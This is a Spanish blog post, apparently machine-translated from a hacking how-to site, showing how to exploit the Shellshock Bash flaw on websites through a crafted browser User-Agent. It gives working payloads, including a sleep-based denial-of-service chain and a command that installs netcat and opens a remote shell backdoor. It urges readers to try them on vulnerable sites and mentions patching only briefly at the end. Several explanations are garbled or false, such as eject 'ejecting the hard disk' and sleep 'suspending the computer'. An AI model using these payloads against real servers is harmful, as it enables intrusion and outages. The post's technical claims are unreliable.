BlogWonderHowTo

Cómo: explotar sitios web vulnerables a Shellshock con solo un navegador web

Estoy seguro de que muchos de nosotros hemos oído hablar de esa desagradable vulnerabilidad de Shellshock, pero no mucha gente sabe cómo explotarla. ¡Pruebe estos trucos en sitios web vulnerables!

Información de contexto

Entonces, ¿qué es Shellshock?

Shellshock es una vulnerabilidad en el shell Bash (v1.1 a v4.3, y posiblemente más …) que permite la ejecución remota de código sin confirmación. Esta es una vulnerabilidad especialmente grande, ya que elimina la necesidad de una codificación compleja que puede tardar años en perfeccionarse. Una serie de personajes aleatorios, () {:; }; , confunde a Bash porque no sabe qué hacer con ellos, por lo que, por defecto, ejecuta el código después de él. Ya se han producido más de 100.000 intentos de explotar cualquier sistema Unix / Linux / OS X e iOS. Hay más de 3000 sitios web vulnerables, y eso sin la cantidad de hardware vulnerable que existe.

Irónicamente, Windows está completamente a salvo de esta vulnerabilidad, que es buena y mala al mismo tiempo. Aproximadamente el 75% + de Internet es Apache, y el 80% de los servidores Apache se ejecutan en Linux, por lo que casi toda Internet es vulnerable.

Cosas que necesitará

Existe esta pequeña extensión para Firefox, Iceweasel y ahora Chrome llamada Conmutador de agente de usuario que nos permite cambiar nuestro agente de usuario para aprovechar esta vulnerabilidad.

Descargalo aquí para Firefox / Iceweasel. Descargar aquí para Chrome.

Expulsar unidad de DVD

¡Así es! ¡Puede abrir la unidad de DVD de una PC vulnerable Shellshock! Abra el menú Herramientas y vaya al Menú de cambio de agente de usuario (podría decir Agente de usuario predeterminado) y seleccione Editar agentes de usuario

Haga clic en Nuevo -> Nuevo agente de usuario … y en el cuadro Agente de usuario: reemplace Mozilla / 5.0 (X11; Linux x86_64; rv: 31.0) Gecko / 20100101 Firefox / 31.0 Iceweasel / 31.2.0 con () {:; }; / bin / eject. / Bin / eject es el archivo / comando que se almacena en cada máquina Linux. Esto expulsará el disco duro. Puede nombrarlo como desee en el cuadro Descripción. Presione OK en ambas ventanas emergentes y abra el menú de Cambio de agente de usuario nuevamente y seleccione su agente de usuario de código de expulsión. Luego, visite un sitio web vulnerable de Shellshock y se abrirá la unidad de DVD de la computadora de alojamiento.

DoS un sitio web

Espero que todos hayan oído hablar de los ataques DoS (denegación de servicio) que se pueden realizar haciendo ping al sitio web con una gran cantidad de bytes, ¡pero esto es ineficaz en comparación con lo que puede hacer con Shellshock!

Vuelva a abrir el menú User Agent Switcher y agregue otro agente con el siguiente código: () {:;}; / bin / sleep 20 | / sbin / sleep 20 | / usr / bin / sleep 20. / Bin / sleep es un comando que hace que la computadora se suspenda. Pero al agregar el número 20 después, Bash ejecutará el comando después de 20 segundos. Puedes ver eso | fluye a través de algunos comandos. Esto se debe a que algunos sistemas operativos son diferentes a otros, por lo que es posible que algunos comandos no funcionen. Pero al conectarlos todos juntos, Bash intentará ejecutar los 3 comandos para que tengamos un mayor éxito. La forma en que esto funciona es que, si va a una página vulnerable con este código y actualiza 10 veces, Bash intentará ejecutar ese código 10 veces al mismo tiempo, lo que hará que la computadora se ralentice, y si usa DDoS (Denegación distribuida of Service) con este ataque, incluso puede hacer que el servidor caiga temporalmente.

Puerta trasera Netcat

Netcat es simplemente una herramienta maravillosa, y aún mejor con Shellshock.

Continúe y cree un nuevo agente de usuario con el código () {:;}; apt-get install netcat; ncat -l -p 6996 -e / bin / sh. Esto primero instalará Netcat si el destino aún no lo tiene, y creará un oyente con un shell como proceso. ¡Asegúrese de conocer la dirección IP del sitio web cuando se conecte!

Parchear su sistema

Shellshock es probablemente 10 veces peor que Heartbleed (en mi opinión), así que visite el sitio web de su distribución para obtener información sobre parches. Si está utilizando Kali Linux, puede encontrar la información del parche en la página de inicio de Debian. Si instaló Kali recientemente, es posible que ya esté parcheado. Cx2H hizo una guía sobre cómo saber si eres vulnerable y cómo parchearlo.

C | H de C3

Publicaciones relacionadas

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Botón volver arriba
Cerrar